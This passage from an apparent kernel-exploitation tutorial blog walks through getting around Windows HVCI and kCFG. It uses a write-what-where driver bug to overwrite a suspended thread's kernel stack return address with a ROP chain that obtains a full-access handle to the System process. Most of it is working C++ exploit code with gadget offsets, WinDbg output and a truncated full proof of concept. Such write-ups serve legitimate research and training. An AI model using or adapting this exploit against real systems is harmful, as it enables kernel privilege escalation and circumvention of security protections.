This is because isolation is implemented through Virtual Trust Levels (VTLs), which I have already explained in: https://ghostbyt3.github.io/blog/Kernel_Exploitation_Primer_0x3#hyper-v.

In our attack, we flipped the PTE bits/flags and cleared the no eXecute bit in VTL0. However, the EPT (Extended Page Tables) entry controlled by VTL1 does not have this change, and it blocks our exploit.

# PTE before clearing the no eXecute bit
---DA--KW-V

# PTE after clearing the no eXecute bit
---DA--KWEV

# EPTE
---DA--W-V
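
One way to read the three views above is that an instruction fetch has to be allowed by both levels of translation. The following is a deliberately simplified model of that rule, with hypothetical type and function names, and it ignores many details of real EPT handling.

```cpp
#include <cassert>

struct GuestPte { bool valid; bool no_execute; }; // VTL0 view, reachable with our write primitive
struct EptEntry { bool execute; };                // second-level view, out of our reach

// Simplified rule: the fetch succeeds only if the guest PTE and the EPT entry both allow it.
constexpr bool can_execute(GuestPte pte, EptEntry ept) {
    return pte.valid && !pte.no_execute && ept.execute;
}

void hvci_examples() {
    // Before the PTE flip: NX set in the guest PTE, no execute permission in the EPT entry.
    assert(!can_execute(GuestPte{true, true}, EptEntry{false}));
    // After the PTE flip: the guest PTE allows execution, the EPT entry still does not.
    assert(!can_execute(GuestPte{true, false}, EptEntry{false}));
    // A page that both levels mark executable runs normally.
    assert(can_execute(GuestPte{true, false}, EptEntry{true}));
}
```

This is why clearing the NX bit alone is no longer enough once HVCI is on.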

Additionally, with HVCI and VBS enabled, kCFG (kernel Control Flow Guard) is also fully enabled. The kCFG bitmap (nt!guard_icall_bitmap), which tracks which function addresses are valid call targets, is also protected by the EPTE, so we can’t overwrite it. However, kCFG protects function pointers (like nt!HalDispatchTable + 0x8) but does not protect return addresses. This means that while we cannot modify function pointers to redirect execution arbitrarily, we can overwrite a return address on the stack to hijack control flow. This is what we are going to do now.

As I mentioned in my previous post, we can’t execute unsigned code within the Windows kernel. But we can leverage a ROP chain to call kernel-mode functions. I attempted similar function calls in the previous post but couldn’t make them reliable, so let’s try again with the WRITE-WHAT-WHERE vulnerability and a different methodology. I am following the methodology Connor McGarr describes in his blog post, which I highly recommend reading.

This is what we are going to do to get around HVCI and abuse the WRITE-WHAT-WHERE to make kernel function calls:

  • Step 1: Create a dummy thread in a suspended state using the CreateThread() API.
  • Step 2: Using the NtQuerySystemInformation() API, leak the KTHREAD structure address of the suspended thread.
  • Step 3: From the KTHREAD structure, retrieve KTHREAD.StackBase, which is the kernel-mode stack address of the thread.
  • Step 4: On the stack, look for a specific function’s return address. When a function is called, the address of the next instruction is pushed onto the stack, and when the callee finishes, its ret instruction pops that return address and jumps to it. kCFG (kernel Control Flow Guard) does not inspect this transfer, so we find a specific return address (more on this later) and replace it with our ROP chain, which makes a kernel function call.
  • Step 5: Once we have found the return address on the stack, write the rest of the ROP chain, which calls ZwOpenProcess() to get a PROCESS_ALL_ACCESS handle to the System process.
  • Step 6: End the ROP chain with a call to the kernel-mode function ZwTerminateThread(), which terminates the dummy thread. Because we corrupted its stack, skipping this step would cause a BSOD.
  • Step 7: Finally, resume the thread using the ResumeThread() API. As the thread continues, it lands on the return address we have overwritten, executes our ROP chain, gets the handle to the System process, and terminates itself.
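
To illustrate Step 4, here is a rough user-mode sketch of the search itself. It assumes the stack contents have already been copied into a local array with the same read trick used earlier, and that the stack grows downward from StackBase. The function name find_return_slot and every value in the example are hypothetical.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// `stack[0]` is the qword just below StackBase, `stack[1]` the one below that, and so on.
// Returns the kernel address of the first slot holding `target_ret`, or 0 if it is not found.
std::uint64_t find_return_slot(const std::vector<std::uint64_t>& stack,
                               std::uint64_t stack_base,
                               std::uint64_t target_ret) {
    for (std::size_t i = 0; i < stack.size(); ++i) {
        if (stack[i] == target_ret) {
            return stack_base - (i + 1) * 8;
        }
    }
    return 0;
}

void stack_scan_example() {
    // Made-up stack snapshot and addresses, for illustration only.
    const std::vector<std::uint64_t> snapshot = {
        0x0ULL, 0xFFFFF80011112222ULL, 0xFFFFF80033334444ULL};
    const std::uint64_t stackBase = 0xFFFFA00000007000ULL;

    // The third qword below StackBase holds the value we are looking for.
    assert(find_return_slot(snapshot, stackBase, 0xFFFFF80033334444ULL) == 0xFFFFA00000006FE8ULL);
    // A value that is not on the stack yields 0.
    assert(find_return_slot(snapshot, stackBase, 0xDEADBEEFULL) == 0);
}
```

The returned address is the WHERE for the first ROP gadget, and the following gadgets go into the slots above it.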

Step 1: Creating a dummy thread

  • A dummy thread can be created by calling the CreateThread() API with CREATE_SUSPENDED as dwCreationFlags.
  • Once the thread is created, the call returns a handle to the suspended dummy thread (dHandle).
  • We also need to specify which function the thread executes once it is resumed; for that I provided a dummy function called donothing().
// Thread entry point with the signature CreateThread() expects; it does nothing.
DWORD WINAPI donothing(LPVOID)
{
    return 0;
}

HANDLE fakethread() {

    HANDLE dHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)donothing, NULL, CREATE_SUSPENDED, NULL);

    if (!dHandle) {
        printf("[-] Failed creating a suspended thread..\n");
    }
    else {
        printf("[+] Dummy thread Handle: %p\n", dHandle);
    }

    return dHandle;
}

int main()
{

    printf("[+] Creating a dummy thread..\n");
    HANDLE dHandle = fakethread();
    if (!dHandle) {
        return 1;
    }
    
    return 0;
}

Step 2: Leak KTHREAD address

  • Now we need to retrieve the KTHREAD of the dummy thread, which we can do with the NtQuerySystemInformation() API.
  • Since we need information about handles, we pass SystemHandleInformation as the SystemInformationClass parameter, which indicates the kind of system information to retrieve.
  • We need the following structures for this: SYSTEM_INFORMATION_CLASS, SYSTEM_HANDLE_INFORMATION, SYSTEM_HANDLE_TABLE_ENTRY_INFO.
  • The SystemHandleInformation class returns information about every handle on the machine.
  • The NtQuerySystemInformation() call stores all of this handle information in SystemHandleInfo. However, we have to provide a buffer large enough to hold it, and we can’t predict that size. We could just allocate a huge buffer, but that’s not reliable.
  • To solve this, I start with 0x1000 bytes and retry with a larger buffer until the call no longer returns STATUS_INFO_LENGTH_MISMATCH.
  • Then the code walks every handle and checks whether its UniqueProcessId matches the current process ID. For handles that belong to the current process, it compares each handle value with the handle passed in as the argument.
  • Once the specific handle is found, we get the object address from SYSTEM_HANDLE_TABLE_ENTRY_INFO, whose Object member holds the address of the object behind the handle. Here the handle is our dummy thread handle, so the object is a thread and the Object member holds its KTHREAD address.
PVOID findKTHREAD(HANDLE dHandle) {

    pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {
        printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
        return FALSE;
    }

    printf("[+] Found ntdll!NtQuerySystemInformation\n");

    ULONG returnLen = 0x1000;
    NTSTATUS success, status;

    PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)returnLen);

    do {
        if (SystemHandleInfo) {
            HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
        }

        SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
        if (!SystemHandleInfo) {
            printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
            return FALSE;
        }

        status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
    } while (status == STATUS_INFO_LENGTH_MISMATCH);

    PVOID dKTHREAD = NULL;
    for (ULONG i = 0; i < SystemHandleInfo->NumberOfHandles; i++)
    {
        if (SystemHandleInfo->Handles[i].UniqueProcessId == GetCurrentProcessId())
        {
            if (dHandle == (HANDLE)SystemHandleInfo->Handles[i].HandleValue)
            {
               dKTHREAD = SystemHandleInfo->Handles[i].Object;
               printf("[+] Found KTHREAD of the dummy thread %p\n", dKTHREAD);
               // The buffer came from HeapAlloc, so it is released exactly once by HeapFree after the loop
               break;
            }
        }
    }
    HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
    return dKTHREAD;
}
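
The buffer-sizing loop is the part of this step that is easiest to get wrong, so here is a minimal, portable sketch of just that pattern. It does not call the real API: fakeQuery is a hypothetical stand-in for NtQuerySystemInformation() that needs a fixed number of bytes, and queryWithGrowingBuffer is an illustrative name, not something from the POC.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Status values as used in the post.
constexpr std::uint32_t kStatusSuccess = 0x00000000;
constexpr std::uint32_t kStatusInfoLengthMismatch = 0xC0000004;

// Hypothetical stand-in for NtQuerySystemInformation: it needs `required`
// bytes, reports that size through returnLen, and fails on a smaller buffer.
std::uint32_t fakeQuery(std::size_t required, void* buffer, std::uint32_t length,
                        std::uint32_t* returnLen) {
    *returnLen = static_cast<std::uint32_t>(required);
    if (buffer == nullptr || length < required) {
        return kStatusInfoLengthMismatch;
    }
    return kStatusSuccess;
}

// Start at 0x1000 bytes and retry with a larger buffer until the query fits.
std::vector<std::uint8_t> queryWithGrowingBuffer(std::size_t required) {
    std::uint32_t len = 0x1000;
    std::vector<std::uint8_t> buffer;
    std::uint32_t status = kStatusInfoLengthMismatch;
    while (status == kStatusInfoLengthMismatch) {
        buffer.assign(len, std::uint8_t{0});  // fresh zeroed buffer of the current size
        std::uint32_t needed = 0;
        status = fakeQuery(required, buffer.data(), len, &needed);
        if (status == kStatusInfoLengthMismatch) {
            // Use the reported size, but always make progress if it is not larger.
            len = (needed > len) ? needed : len * 2;
        }
    }
    assert(status == kStatusSuccess);
    return buffer;
}
```

Calling queryWithGrowingBuffer(0x25000) fails once with the 0x1000-byte buffer and succeeds on the second attempt. On a live system the handle count can change between calls, which is why the sketch falls back to doubling when the reported size is not larger than the current one.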

I executed the POC and it created a dummy thread with handle 0xA8. Process Explorer shows the same KTHREAD address for that handle as the one leaked by the POC, so the lookup works.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 3: Retrieving kernel stack address

KTHREAD is the kernel structure associated with every thread, and it holds all of the thread’s state (a big topic of its own that I can’t cover here). All we need to know for now is that KTHREAD contains two members that are required for the upcoming steps, along with their offsets:

  • StackLimit - offset 0x30
  • StackBase - offset 0x38

As I said earlier, each thread has its own stack, and its address can be retrieved through the StackBase member of KTHREAD.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Now that we have the KTHREAD address, we can calculate the addresses of StackLimit and StackBase and read their values using the Write-What-Where primitive, just like we did in the previous methods.

I created a kernelRead() function that takes the address to read (readAddr) and returns the value stored there. It calls TriggerArbitraryWrite() with WHAT set to that address and WHERE set to a user-mode buffer.

PVOID kernelRead(PVOID readAddr, HANDLE hDriver) {

    WRITE_WHAT_WHERE input;
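    // Allocate the scratch buffer once and reuse it, instead of leaking a new region on every read
    static LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);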

    input.WHAT = (LPVOID)(readAddr);
    input.WHERE = (LPVOID)(storeAddr);

    printf("[+] Calling TriggerArbitraryWrite to Read %p....", readAddr);
    BOOL success = DeviceIoControl( // DeviceIoControl returns a BOOL, not an NTSTATUS
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return FALSE;
    }

    LPVOID* data = (LPVOID*)storeAddr;
    return *data;
}
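
To make the read/write duality of the primitive explicit, here is a small user-mode simulation. It is only a sketch: fakeTriggerArbitraryWrite is a hypothetical stand-in for the driver routine and assumes it copies one pointer-sized (8-byte) value from *What to *Where. The names primitiveRead, primitiveWrite and roundTrip are illustrative as well.

```cpp
#include <cassert>
#include <cstdint>

struct WriteWhatWhere {
    void* What;   // address the "driver" reads 8 bytes from
    void* Where;  // address the "driver" writes those 8 bytes to
};

// Hypothetical user-mode stand-in for the vulnerable routine:
// copy one 8-byte value from *What to *Where, with no validation.
void fakeTriggerArbitraryWrite(const WriteWhatWhere* input) {
    assert(input && input->What && input->Where);
    *static_cast<std::uint64_t*>(input->Where) =
        *static_cast<const std::uint64_t*>(input->What);
}

// Read: What = the address we want to read, Where = a variable we own.
std::uint64_t primitiveRead(const std::uint64_t* target) {
    std::uint64_t value = 0;
    WriteWhatWhere input{const_cast<std::uint64_t*>(target), &value};
    fakeTriggerArbitraryWrite(&input);
    return value;
}

// Write: What = the address of our data, Where = the address to overwrite.
void primitiveWrite(std::uint64_t data, std::uint64_t* target) {
    WriteWhatWhere input{&data, target};
    fakeTriggerArbitraryWrite(&input);
}

// Write a value into a pretend kernel slot, then read it back.
std::uint64_t roundTrip(std::uint64_t value) {
    std::uint64_t fakeKernelSlot = 0;
    primitiveWrite(value, &fakeKernelSlot);
    return primitiveRead(&fakeKernelSlot);
}
```

The only difference between the two directions is which side of the copy we point at memory we control. That is why one vulnerable IOCTL is enough for both kernelRead and the later kernelWrite.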

Calling kernelRead() with the KTHREAD address plus the respective offset retrieves both the StackLimit and StackBase values.

// Step 3
PVOID stackLimit = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x30), hDriver); // KTHREAD.StackLimit
printf("[+] Dummy thread's StackLimit: %p\n", stackLimit);

PVOID stackBase = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x38), hDriver); // KTHREAD.StackBase
printf("[+] Dummy thread's StackBase: %p\n", stackBase);

I executed the updated POC, retrieved the StackLimit and StackBase addresses, and cross-verified them against the KTHREAD structure of the dummy thread.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

With the retrieved addresses, the total stack size of the thread is 0x6000 bytes. We need this for the next step.

0: kd> ? 0xfffff88e`b4126000 - 0xfffff88e`b4120000
Evaluate expression: 24576 = 00000000`00006000
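
The same arithmetic can be sketched in code. The two offsets are the ones quoted above for my build and will likely differ on other Windows versions. The helper names memberAddress and stackSize are made up for this illustration.

```cpp
#include <cassert>
#include <cstdint>

// Offsets quoted in the post for the author's build; other builds may differ.
constexpr std::uint64_t kOffsetStackLimit = 0x30;
constexpr std::uint64_t kOffsetStackBase  = 0x38;

// Address of a KTHREAD member, i.e. the value handed to kernelRead().
inline std::uint64_t memberAddress(std::uint64_t kthread, std::uint64_t offset) {
    return kthread + offset;
}

// The stack grows downwards, so StackBase is the higher of the two addresses.
inline std::uint64_t stackSize(std::uint64_t stackBase, std::uint64_t stackLimit) {
    assert(stackBase >= stackLimit);
    return stackBase - stackLimit;
}
```

With the values from the WinDBG session, stackSize(0xfffff88eb4126000, 0xfffff88eb4120000) gives 0x6000, matching the expression evaluated above.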

Step 4: Find the return address of nt!KiApcInterrupt

Our goal is to overwrite one specific return address on the stack of the dummy thread we created. Using WinDBG’s !thread extension with the KTHREAD address, we can view the call stack. You might notice the function nt!KiApcInterrupt; this is the return address we will be overwriting.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

When a new thread is created, it initially runs nt!KiStartUserThread in kernel mode, which then calls the initial thread routine, nt!PspUserThreadStartup; you can see both in the call stack. Since we created the thread in a suspended state (CREATE_SUSPENDED), all of its execution is on hold, including the donothing() function we made.

If you look at the call stack, the nt!KiApcInterrupt+0x2ff entry (TrapFrame @ fffff88eb4125740) has a trap frame attached. The trap frame stores the CPU register state, which allows execution to continue correctly when the thread is resumed.

So when the thread is resumed, it returns to nt!KiApcInterrupt+0x2ff. We need to find this return address on the stack and overwrite it with our ROP gadgets.

On my machine the return address is nt!KiApcInterrupt+0x2ff, so we need its offset from the nt base. The absolute address (nt base + offset) is the value stored on the stack, and that is what we are going to search for.

0: kd> ? nt!KiApcInterrupt+0x2ff - nt
Evaluate expression: 4209647 = 00000000`00403bef

When the thread is resumed (from user mode using ResumeThread()), execution returns through that stack slot, which by then holds the start of our ROP chain. That’s the goal.

In the previous step we got StackBase and StackLimit, and now we also have the offset of nt!KiApcInterrupt+0x2ff, so we can search the thread’s stack for this address.

The following for loop reads 8 bytes at a time using kernelRead, starting from the top of the stack (StackBase) and moving towards the end of the stack (StackLimit). Remember that the stack grows downwards, so we move towards lower memory addresses.

 // Step 4
 LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
 printf("[+] Nt base address: %p\n", nt_addr);

 int stackSize = (uintptr_t)stackBase - (uintptr_t)stackLimit;
 PVOID retAddr = NULL;
 PVOID stackRet = NULL;
 for (int i = 0x8; i < stackSize - 0x8; i += 0x8)
 {
     retAddr = kernelRead(PVOID((uintptr_t)stackBase - i), hDriver);

     if (retAddr == PVOID((uintptr_t)nt_addr + 0x00403bef)) // nt!KiApcInterrupt+0x2ff
     {
         printf("[+] Found nt!KiApcInterrupt+0x2ff in the stack %p\n", PVOID((uintptr_t)stackBase - i));
         stackRet = PVOID((uintptr_t)stackBase - i);
         break;
     }
 }
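
Here is a self-contained sketch of the same downward scan over a simulated stack, so the loop bounds can be checked without a kernel debugger. FakeStack, findReturnSlot and demoScan are hypothetical names, and the nt base in demoScan is a made-up value. Only the 0x00403bef offset, the stack range and the expected slot address come from the session above.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Simulated kernel stack: slots[0] sits at stackLimit, the last slot ends at StackBase.
struct FakeStack {
    std::uint64_t stackLimit;
    std::vector<std::uint64_t> slots;

    std::uint64_t stackBase() const { return stackLimit + slots.size() * 8; }

    // Stand-in for kernelRead(): return the 8 bytes stored at addr.
    std::uint64_t read(std::uint64_t addr) const {
        assert(addr >= stackLimit && addr < stackBase() && (addr - stackLimit) % 8 == 0);
        return slots[(addr - stackLimit) / 8];
    }
};

// Walk from just below StackBase towards StackLimit, 8 bytes at a time, and
// return the address of the first slot holding target (0 if it is absent).
std::uint64_t findReturnSlot(const FakeStack& stack, std::uint64_t target) {
    const std::uint64_t base = stack.stackBase();
    for (std::uint64_t off = 8; off <= base - stack.stackLimit; off += 8) {
        if (stack.read(base - off) == target) {
            return base - off;
        }
    }
    return 0;
}

// Build a 0x6000-byte stack, plant the return address, and scan for it.
std::uint64_t demoScan() {
    const std::uint64_t ntBase = 0xfffff80000000000ULL;  // made-up base address
    const std::uint64_t target = ntBase + 0x00403bef;    // nt!KiApcInterrupt+0x2ff
    FakeStack stack{0xfffff88eb4120000ULL, std::vector<std::uint64_t>(0x6000 / 8, 0)};
    stack.slots[(0xfffff88eb4125738ULL - stack.stackLimit) / 8] = target;
    return findReturnSlot(stack, target);
}
```

The scan starts at StackBase - 8 because StackBase itself is one past the highest usable slot. Because it begins at the high end, it returns the occurrence closest to StackBase if the value appears more than once.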

I paused the execution using getchar() to analyze it. The above code found nt!KiApcInterrupt+0x2ff on the stack at 0xFFFFF88EB4125738, and WinDBG confirmed the same. Now that we have the location of the return address we need to overwrite, let’s move to the next step.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 5 & 6: Writing ROP gadgets to call ZwOpenProcess & ZwTerminateThread

Similar to kernelRead, I created a kernelWrite function that takes the value to write (data) and the location to write it to (writeAddr) as arguments. It calls TriggerArbitraryWrite to write that value to the provided address.

BOOL kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) {

    WRITE_WHAT_WHERE input;
    input.WHAT = (LPVOID)(&data);       // the driver reads the 8 bytes to write from here
    input.WHERE = (LPVOID)(writeAddr);  // and stores them at this address

    printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr);

    // DeviceIoControl returns a BOOL, not an NTSTATUS
    BOOL success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
    }

    // Every path returns a value, so callers can check the result
    return success;
}

The ROP chain is similar to what I have used previously. It calls ZwOpenProcess to get a full-access handle to the System process. Then it terminates the dummy thread by calling ZwTerminateThread. The reason for this second call is that we messed up the dummy thread’s stack with our ROP gadgets, so once ZwOpenProcess returns, the thread would try to continue normally and that would lead to a BSOD. To avoid this we simply terminate the thread, since we don’t need it anymore.

  • ZwOpenProcess requires some structures as parameters, but they can be declared in user mode.
  • ZwTerminateThread requires the dummy thread’s handle; since I already stored it in dHandle, I just used that.
  • A for loop writes each ROP gadget to the stack. The location of nt!KiApcInterrupt+0x2ff is stored in stackRet, so that is the first address written, and the address is then increased by 8 bytes on every iteration to move to the next slot.
// Step 5

// RCX - ProcessHandle
HANDLE hSystem = NULL;

// R8 - ObjectAttributes
OBJECT_ATTRIBUTES objAttrs = { 0 };
memset(&objAttrs, 0, sizeof(objAttrs));
objAttrs.ObjectName = NULL;
objAttrs.Length = sizeof(objAttrs);

// R9 - ClientId
CLIENT_ID clientId = { 0 };
clientId.UniqueProcess = ULongToHandle(4);
clientId.UniqueThread = NULL;

LPVOID rop[] = {
    (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
    (LPVOID)&hSystem, // Handle
    (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
    (LPVOID)PROCESS_ALL_ACCESS,
    (LPVOID)((uintptr_t)nt_addr + 0x00201861), // pop r8; ret
    (LPVOID)&objAttrs,
    (LPVOID)((uintptr_t)nt_addr + 0x00201862), // pop rax; ret
    (LPVOID)&clientId,
    (LPVOID)((uintptr_t)nt_addr + 0x00343f0e), // mov r9, rax; mov rax, r9; add rsp, 0x28; ret;
    (LPVOID)(0x4141414141414141), // 0x8
    (LPVOID)(0x4141414141414141), // 0x10
    (LPVOID)(0x4141414141414141), // 0x18
    (LPVOID)(0x4141414141414141), // 0x20
    (LPVOID)(0x4141414141414141), // 0x28
    (LPVOID)((uintptr_t)nt_addr + 0x003fb260), // nt!ZwOpenProcess
    (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
    (LPVOID)(ULONG64)dHandle, // Thread Handle
    (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
    (LPVOID)(0x0000000000000000),
    (LPVOID)((uintptr_t)nt_addr + 0x003fb800), // nt!ZwTerminateThread // Step 6
};

printf("[+] Writing Shellcode to the thread stack...\n");

for (int i = 0; i < sizeof(rop) / sizeof(rop[0]); i++) {
    kernelWrite((rop[i]), stackRet, hDriver);
    stackRet = (LPVOID)((uintptr_t)stackRet + 0x8);
}
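
The five 0x4141414141414141 entries exist because the mov r9, rax gadget ends with add rsp, 0x28; ret, which skips 0x28 bytes of stack before returning. Here is a small sketch of that layout arithmetic. The helper names are made up for the illustration and nothing here touches a real stack.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Number of 8-byte filler slots skipped by an "add rsp, N; ret" gadget.
inline std::size_t fillerSlots(std::size_t addRspBytes) {
    assert(addRspBytes % 8 == 0);
    return addRspBytes / 8;
}

// Stack address that receives rop[index] when the chain starts at stackRet.
inline std::uint64_t slotAddress(std::uint64_t stackRet, std::size_t index) {
    assert(stackRet % 8 == 0);
    return stackRet + index * 8;
}

// Index of the entry consumed by the `ret` that ends the add-rsp gadget:
// the gadget sits at gadgetIndex, the fillers follow, then the next target.
inline std::size_t nextTargetIndex(std::size_t gadgetIndex, std::size_t addRspBytes) {
    return gadgetIndex + 1 + fillerSlots(addRspBytes);
}
```

In the chain above the gadget is entry 8, so nextTargetIndex(8, 0x28) is 14, which is exactly where nt!ZwOpenProcess sits. With stackRet at 0xFFFFF88EB4125738, that entry lands at 0xFFFFF88EB41257A8.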

I executed the above POC, and we can see that the nt!KiApcInterrupt+0x2ff return address has been overwritten by the first ROP gadget and the rest of the ROP chain is in place.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 7: Resume the Thread

Now that everything is ready, we can resume the thread by calling ResumeThread.

ResumeThread(dHandle);

Sleep(2000);

printf("[+] System process Handle 0x%p\n", hSystem); // a HANDLE is pointer-sized, so print it with %p

getchar();

Once the thread is resumed, it picks up the slot that used to hold the nt!KiApcInterrupt+0x2ff return address. Since that slot has been replaced by our ROP chain, the thread starts executing the chain and eventually calls ZwOpenProcess to get a full-control handle to the System process.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

HVCI is one of the most powerful mitigations, and we didn’t actually bypass it: we still can’t execute unsigned shellcode, so instead we worked around it by calling kernel APIs. We did bypass kCFG with the dummy thread method, but kernel-mode Control-flow Enforcement Technology (kCET) will block this method if it’s enabled. It’s not enabled by default, at least for now.

  • Full POC

    // whatwhere3.cpp : This file contains the 'main' function. Program execution begins and ends there.
    //
    
    #include <Windows.h>
    #include <stdio.h>
    #include <psapi.h>
    #include "header.h"
    
    #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)
    typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
    
    #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
    
    typedef struct _WRITE_WHAT_WHERE {
        void* WHAT;
        void* WHERE;
    } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;
    
    PVOID getbaseaddress(LPCWSTR name)
    {
        BOOL status;
        LPVOID* pImageBase;
        DWORD ImageSize;
        WCHAR driverName[1024];
        LPVOID driverBase = nullptr;
    
        status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
    
        pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    
        status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
    
        int driver_count = ImageSize / sizeof(pImageBase[0]);
    
        for (int i = 0; i < driver_count; i++) {
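            // The size argument is a character count, so divide by the element size (WCHAR), not by sizeof(char)
            GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(driverName[0]));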
    
            if (!wcscmp(name, driverName)) {
                driverBase = pImageBase[i];
                break;
            }
        }
    
        return driverBase;
    }
    
    void donothing()
    {
        return;
    }
    
    HANDLE fakethread() {
    
        HANDLE dHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)donothing, NULL, CREATE_SUSPENDED, NULL);
    
        if (!dHandle) {
            printf("[-] Failed creating a suspended thread..\n");
        }
        else {
            printf("[+] Dummy thread Handle: 0x%p\n", dHandle);
        }
    
        return dHandle;
    }
    
    PVOID findKTHREAD(HANDLE dHandle) {
        pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
            GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    
        if (!NtQuerySystemInformation) {
            printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
            return FALSE;
        }
    
        printf("[+] Found ntdll!NtQuerySystemInformation\n");
    
        ULONG returnLen = 0x1000;
        NTSTATUS status;
    
        PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)returnLen);
    
        do {
            if (SystemHandleInfo) {
                HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
            }
    
            SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
            if (!SystemHandleInfo) {
                printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
                return FALSE;
            }
    
            status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
        } while (status == STATUS_INFO_LENGTH_MISMATCH);
    
        PVOID dKTHREAD = NULL;
        for (ULONG i = 0; i < SystemHandleInfo->NumberOfHandles; i++)
        {
            if (SystemHandleInfo->Handles[i].UniqueProcessId == GetCurrentProcessId())
            {
                if (dHandle == (HANDLE)SystemHandleInfo->Handles[i].HandleValue)
                {
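                    dKTHREAD = SystemHandleInfo->Handles[i].Object;
                    printf("[+] Found KTHREAD of the dummy thread %p\n", dKTHREAD);
                    break;
                }
            }
        }
        // Release the HeapAlloc buffer with HeapFree; dKTHREAD stays NULL if nothing matched
        HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
        return dKTHREAD;
    }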
    
    PVOID kernelRead(PVOID readAddr, HANDLE hDriver) {
    
        WRITE_WHAT_WHERE input;
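        // Allocate the scratch buffer once and reuse it, instead of leaking a new region on every read
        static LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);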
    
        input.WHAT = (LPVOID)(readAddr);
        input.WHERE = (LPVOID)(storeAddr);
    
        printf("[+] Calling TriggerArbitraryWrite to Read %p....", readAddr);
        BOOL success = DeviceIoControl( // DeviceIoControl returns a BOOL, not an NTSTATUS
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return FALSE;
        }
    
        LPVOID* data = (LPVOID*)storeAddr;
        return *data;
    }
    
    BOOL kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) {
    
        WRITE_WHAT_WHERE input;
        input.WHAT = (LPVOID)(&data);       // the driver reads the 8 bytes to write from here
        input.WHERE = (LPVOID)(writeAddr);  // and stores them at this address
    
        printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr);
    
        // DeviceIoControl returns a BOOL, not an NTSTATUS
        BOOL success = DeviceIoControl(
            hDriver,
